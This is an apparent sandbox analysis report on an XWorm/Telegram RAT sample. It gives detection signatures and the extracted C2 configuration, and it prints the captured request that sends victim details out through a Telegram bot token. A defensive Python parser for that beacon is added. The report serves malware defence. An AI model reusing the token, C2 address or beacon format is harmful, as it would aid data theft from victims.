Windows Analysis Report
DA92phBHUS.exe

Overview

General Information

Sample name: DA92phBHUS.exe
renamed because original name is a hash value
Original sample name: 649673218a19e8fd278c99d1355949f4.exe
Analysis ID: 1544503
MD5: 649673218a19e8fd278c99d1355949f4
SHA1: da2b13b98dbb3ba3973388866860cb7cb3d2b59e
SHA256: 7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
Tags: 32exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppresses errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: RegAsm.exe.3608.23.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}
Source: DA92phBHUS.exe ReversingLabs: Detection: 18%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.4% probability
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: 193.41.226.233
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: 2222
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: <123456789>
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: <Xwormmm>
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: XWORM v5.6
Source: 23.2.RegAsm.exe.1030000.0.unpack String decryptor: USB.exe
Source: DA92phBHUS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2
Source: DA92phBHUS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA4005
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00EA494A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA3CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAC2FF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00EACD9F
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD14 FindFirstFileW,FindClose, 10_2_00EACD14
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF5D8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF735
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAFA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00354005
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035C2FF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose, 18_2_0035494A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD14 FindFirstFileW,FindClose, 18_2_0035CD14
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 18_2_0035CD9F
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F5D8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F735
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035FA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00353CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799\

Networking

Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:64431 -> 193.41.226.233:2222
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.41.226.233:2222 -> 192.168.2.4:64431
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:64431 -> 193.41.226.233:2222
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:64427 -> 149.154.167.220:443
Source: Malware configuration extractor URLs: 193.41.226.233
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.4:64431 -> 193.41.226.233:2222
Source: global traffic HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: AVORODE
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown TCP traffic detected without corresponding DNS query: 193.41.226.233
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 10_2_00EB29BA
Source: global traffic HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: nAtuEYczbaU.nAtuEYczbaU
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: DA92phBHUS.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: DA92phBHUS.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: DA92phBHUS.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DA92phBHUS.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0N
Source: DA92phBHUS.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: DA92phBHUS.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Dump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: DA92phBHUS.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: Dump.pif.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 64427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64427
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2
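The Telegram check-in captured above carries the operator's bot token in the URL path and the victim fingerprint, percent-encoded, in the text parameter. The following Python is an added example, not part of this Joe Sandbox report and not XWorm code, that parses such a request line into its indicators so it can be run over proxy logs. The request string is the one the report captured, embedded here as constructed input (the Host header that extraction folded onto the same line is left out); the function names are the example's own, and the field names and misspellings (New Clinet, Groub) are the malware's.

```python
"""Parse an XWorm Telegram check-in request into its indicators.

Added example: it is not part of the Joe Sandbox report and not XWorm code.
The request line below is the one the report captured (constructed here as a
Python string; the "Host:" header that extraction folded into it is dropped).
Field names and misspellings ("New Clinet", "Groub") are the malware's own.
"""
import re
from urllib.parse import urlsplit, parse_qs

SAMPLE_REQUEST = (
    "GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"
    "?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0A"
    "New%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0A"
    "UserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0A"
    "USB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0A"
    "RAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1"
)

# Bot API paths look like /bot<numeric bot id>:<secret>/<method>.
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
# The client id XWorm sends is a bare hex string on its own line.
HEX_ID_RE = re.compile(r"^[0-9A-Fa-f]{16,}$")


def parse_fingerprint(text):
    """Split the message body into the 'Key : Value' pairs XWorm sends.

    The banner line and the hex client id have no separator, so they are
    stored under 'banner' and 'client_id' instead of being dropped.
    """
    fields = {}
    loose = []
    for raw in text.split("\r\n"):
        if not raw.strip():
            continue
        if " : " in raw:
            key, _, value = raw.partition(" : ")
            fields[key.strip()] = value.strip()
        elif HEX_ID_RE.match(raw.strip()):
            fields["client_id"] = raw.strip()
        else:
            loose.append(raw.strip())
    if loose:
        fields["banner"] = loose[0]
    return fields


def parse_telegram_beacon(request_line):
    """Return token, chat and host fields from a Bot API request line.

    Returns None for request lines that are not Telegram Bot API calls, so
    the function can be applied to every request in a proxy log.
    """
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    m = BOT_PATH_RE.match(url.path)
    if not m:
        return None
    # parse_qs percent-decodes the values as UTF-8, so the text is ready to split.
    query = parse_qs(url.query, keep_blank_values=True)
    text = query.get("text", [""])[0]
    return {
        "http_method": parts[0],
        "bot_token": m.group("token"),
        "bot_id": m.group("token").split(":", 1)[0],
        "api_method": m.group("method"),
        "chat_id": query.get("chat_id", [None])[0],
        "fields": parse_fingerprint(text),
    }


if __name__ == "__main__":
    result = parse_telegram_beacon(SAMPLE_REQUEST)
    print("bot id  :", result["bot_id"])
    print("chat id :", result["chat_id"])
    for key, value in result["fields"].items():
        print(f"{key:12}: {value}")
```

The bot token is the credential for the exfiltration channel and the chat_id is the operator's mailbox; both travel in the clear inside the URL, so any TLS-inspecting proxy or sandbox capture yields them, and both are the values to report to Telegram and to pivot on across other samples.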

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 10.3.Dump.pif.151caa0.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
